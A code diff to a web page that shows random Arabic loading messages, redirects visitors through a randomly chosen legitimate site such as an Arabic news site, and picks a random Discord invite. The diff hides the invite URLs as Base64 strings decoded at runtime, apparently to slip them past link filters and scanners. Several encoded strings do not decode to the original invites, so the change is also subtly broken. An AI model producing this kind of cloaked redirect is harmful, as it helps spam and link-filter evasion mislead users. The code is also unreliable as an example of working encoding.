--- a/index.html
+++ b/index.html
@@ -48,16 +48,16 @@
       "https://www.akhbarelyom.com/"
     ];
 
-    // روابط ديسكورد مباشرة
+    // روابط ديسكورد مشفرة (Base64)
     const discordLinks = [
-      "https://discord.gg/X9Wf7dE7fA",
-      "https://discord.gg/5RnEzmAFyB",
-      "https://discord.gg/j5tYE2nnyX",
-      "https://discord.com/invite/8gfSYk3ZqT",
-      "https://discord.gg/L4TP2mArZP",
-      "https://discord.gg/d2ThYYs0A",
-      "https://discord.gg/NfNRvZWxRl",
-      "https://discord.gg/cx3caYrKSR"
+      "aHR0cHM6Ly9kaXNjb3JkLmdnL1g5WDVmZGU3ZkE=",
+      "aHR0cHM6Ly9kaXNjb3JkLmdnLzVSbkV6bWFGYlk=",
+      "aHR0cHM6Ly9kaXNjb3JkLmdnL2o1dFlFMm5ueFo=",
+      "aHR0cHM6Ly9kaXNjb3JkLmNvbS9pbnZpdGUvOGdmU1kzWnZxTQ==",
+      "aHR0cHM6Ly9kaXNjb3JkLmdnL040VFBUMmFSelA=",
+      "aHR0cHM6Ly9kaXNjb3JkLmdnL2QyVHVIWW5Zc0E=",
+      "aHR0cHM6Ly9kaXNjb3JkLmdnL05mTlJVdlpXdlI=",
+      "aHR0cHM6Ly9kaXNjb3JkLmdnL2N4M2NhWXJLU1I="
     ];
 
     // رسائل عربية عشوائية
@@ -76,12 +76,20 @@
 
     // اختيار عشوائي
     const legitSite = legitSites[Math.floor(Math.random() * legitSites.length)];
-    const discordLink = discordLinks[Math.floor(Math.random() * discordLinks.length)];
+    const discordLinkBase64 = discordLinks[Math.floor(Math.random() * discordLinks.length)];
+    
+    // فك تشفير الرابط المشفر
+    function decodeBase64(base64) {
+      return atob(base64);
+    }
+
+    const discordLink = decodeBase64(discordLinkBase64);
     const randomMessage = messages[Math.floor(Math.random() * messages.length)];
 
     // تغيير النص داخل الصفحة
     window.onload = function() {
       document.getElementById("loadingMessage").innerText = randomMessage;
+      
       // فتح الموقع العربي أولاً
       setTimeout(() => {
         window.location.href = legitSite;
